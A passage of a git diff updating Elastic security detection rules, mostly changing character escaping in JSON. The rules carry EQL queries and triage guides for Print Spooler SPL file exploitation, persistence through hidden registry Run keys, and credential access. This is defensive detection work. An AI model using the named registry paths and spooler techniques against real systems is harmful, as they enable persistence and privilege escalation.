name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Ensure that the machine has the latest security updates and is not running legacy Windows versions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Print Spooler SPL File Created\n\nPrint Spooler is a Windows service enabled by default in all Windows clients and servers. The service manages print jobs by loading printer drivers, receiving files to be printed, queuing them, scheduling, etc.\n\nThe Print Spooler service has some known vulnerabilities that attackers can abuse to escalate privileges to SYSTEM, like CVE-2020-1048 and CVE-2020-1337. This rule looks for unusual processes writing SPL files to the location `?:\\Windows\\System32\\spool\\PRINTERS\\`, which is an essential step in exploiting these vulnerabilities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Ensure that the machine has the latest security updates and is not running legacy Windows versions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.extension : \"spl\" and\n file.path : \"?:\\\\Windows\\\\System32\\\\spool\\\\PRINTERS\\\\*\" and\n not process.name : (\"spoolsv.exe\",\n \"printfilterpipelinesvc.exe\",\n \"PrintIsolationHost.exe\",\n \"splwow64.exe\",\n \"msiexec.exe\",\n \"poqexec.exe\") and\n not user.id : \"S-1-5-18\" and\n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"\\\\Device\\\\Mup\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\printui.exe\",\n \"?:\\\\Windows\\\\System32\\\\mstsc.exe\",\n \"?:\\\\Windows\\\\System32\\\\spool\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\PROGRA~1\\\\*.exe\",\n \"?:\\\\PROGRA~2\\\\*.exe\")\n", "references": [ "https://safebreach.com/Post/How-we-bypassed-CVE-2020-1048-Patch-and-got-CVE-2020-1337" @@ -68,7 +68,7 @@ ], "risk_score": 73, "rule_id": "a7ccae7b-9d2c-44b2-a061-98e5946971fa", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -82,7 +82,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_104.json b/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_104.json index cb0708811ea..259f9b6fa15 100644 --- a/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_104.json +++ b/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_104.json @@ -54,7 +54,7 @@ ], "risk_score": 73, "rule_id": "a7e7bfa3-088e-4f13-b29e-3986e0e756b8", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_105.json b/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_105.json index b8a3fc4b556..9b1e0399c19 100644 --- a/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_105.json +++ b/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_105.json @@ -54,7 +54,7 @@ ], "risk_score": 73, "rule_id": "a7e7bfa3-088e-4f13-b29e-3986e0e756b8", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_106.json b/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_106.json index 2b02f7714b7..65805f74169 100644 --- a/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_106.json +++ b/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_106.json @@ -54,7 +54,7 @@ ], "risk_score": 73, "rule_id": "a7e7bfa3-088e-4f13-b29e-3986e0e756b8", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_107.json b/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_107.json index cc307099bdc..a4f368cf02f 100644 --- a/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_107.json +++ b/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_107.json @@ -54,7 +54,7 @@ ], "risk_score": 73, "rule_id": "a7e7bfa3-088e-4f13-b29e-3986e0e756b8", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/a8afdce2-0ec1-11ee-b843-f661ea17fbcd_1.json b/packages/security_detection_engine/kibana/security_rule/a8afdce2-0ec1-11ee-b843-f661ea17fbcd_1.json index 9d440ead0f5..aec1a5a59a3 100644 --- a/packages/security_detection_engine/kibana/security_rule/a8afdce2-0ec1-11ee-b843-f661ea17fbcd_1.json +++ b/packages/security_detection_engine/kibana/security_rule/a8afdce2-0ec1-11ee-b843-f661ea17fbcd_1.json @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/a8afdce2-0ec1-11ee-b843-f661ea17fbcd_2.json b/packages/security_detection_engine/kibana/security_rule/a8afdce2-0ec1-11ee-b843-f661ea17fbcd_2.json index 7dcaeff60ad..083a4a16e6b 100644 --- a/packages/security_detection_engine/kibana/security_rule/a8afdce2-0ec1-11ee-b843-f661ea17fbcd_2.json +++ b/packages/security_detection_engine/kibana/security_rule/a8afdce2-0ec1-11ee-b843-f661ea17fbcd_2.json @@ -96,7 +96,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/a8d35ca0-ad8d-48a9-9f6c-553622dca61a_1.json b/packages/security_detection_engine/kibana/security_rule/a8d35ca0-ad8d-48a9-9f6c-553622dca61a_1.json index 86b389c4612..5009122ebc0 100644 --- a/packages/security_detection_engine/kibana/security_rule/a8d35ca0-ad8d-48a9-9f6c-553622dca61a_1.json +++ b/packages/security_detection_engine/kibana/security_rule/a8d35ca0-ad8d-48a9-9f6c-553622dca61a_1.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_101.json b/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_101.json index cac27ffb1b6..f624b758b16 100644 --- a/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_101.json +++ b/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_101.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_102.json b/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_102.json index 0ee1df0ef5b..6d16e1b0668 100644 --- a/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_102.json +++ b/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/a99f82f5-8e77-4f8b-b3ce-10c0f6afbc73_203.json b/packages/security_detection_engine/kibana/security_rule/a99f82f5-8e77-4f8b-b3ce-10c0f6afbc73_203.json index a7ecf24fafa..e0f5076b4d2 100644 --- a/packages/security_detection_engine/kibana/security_rule/a99f82f5-8e77-4f8b-b3ce-10c0f6afbc73_203.json +++ b/packages/security_detection_engine/kibana/security_rule/a99f82f5-8e77-4f8b-b3ce-10c0f6afbc73_203.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/a99f82f5-8e77-4f8b-b3ce-10c0f6afbc73_204.json b/packages/security_detection_engine/kibana/security_rule/a99f82f5-8e77-4f8b-b3ce-10c0f6afbc73_204.json index 2acc4e34297..89ccf216630 100644 --- a/packages/security_detection_engine/kibana/security_rule/a99f82f5-8e77-4f8b-b3ce-10c0f6afbc73_204.json +++ b/packages/security_detection_engine/kibana/security_rule/a99f82f5-8e77-4f8b-b3ce-10c0f6afbc73_204.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/a99f82f5-8e77-4f8b-b3ce-10c0f6afbc73_205.json b/packages/security_detection_engine/kibana/security_rule/a99f82f5-8e77-4f8b-b3ce-10c0f6afbc73_205.json index 04f6349c88e..29a144eb66c 100644 --- a/packages/security_detection_engine/kibana/security_rule/a99f82f5-8e77-4f8b-b3ce-10c0f6afbc73_205.json +++ b/packages/security_detection_engine/kibana/security_rule/a99f82f5-8e77-4f8b-b3ce-10c0f6afbc73_205.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_102.json b/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_102.json index 97b87e544f8..a7bad66b1d7 100644 --- a/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_102.json +++ b/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_102.json @@ -15,7 +15,7 @@ "license": "Elastic License v2", "name": "Persistence via Hidden Run Key Detected", "note": "", - "query": "/* Registry Path ends with backslash */\nregistry where host.os.type == \"windows\" and /* length(registry.data.strings) \u003e 0 and */\n registry.path : (\"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\")\n", + "query": "/* Registry Path ends with backslash */\nregistry where host.os.type == \"windows\" and /* length(registry.data.strings) > 0 and */\n registry.path : (\"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\")\n", "references": [ "https://github.com/outflanknl/SharpHide", "https://github.com/ewhitehats/InvisiblePersistence/blob/master/InvisibleRegValues_Whitepaper.pdf" @@ -44,7 +44,7 @@ ], "risk_score": 73, "rule_id": "a9b05c3b-b304-4bf9-970d-acdfaef2944c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_103.json b/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_103.json index b56778c3d07..e06afeab810 100644 --- a/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_103.json +++ b/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_103.json @@ -15,7 +15,7 @@ "license": "Elastic License v2", "name": "Persistence via Hidden Run Key Detected", "note": "", - "query": "/* Registry Path ends with backslash */\nregistry where host.os.type == \"windows\" and /* length(registry.data.strings) \u003e 0 and */\n registry.path : (\"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\")\n", + "query": "/* Registry Path ends with backslash */\nregistry where host.os.type == \"windows\" and /* length(registry.data.strings) > 0 and */\n registry.path : (\"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\")\n", "references": [ "https://github.com/outflanknl/SharpHide", "https://github.com/ewhitehats/InvisiblePersistence/blob/master/InvisibleRegValues_Whitepaper.pdf" @@ -44,7 +44,7 @@ ], "risk_score": 73, "rule_id": "a9b05c3b-b304-4bf9-970d-acdfaef2944c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_104.json b/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_104.json index ceebff52074..35f906335c1 100644 --- a/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_104.json +++ 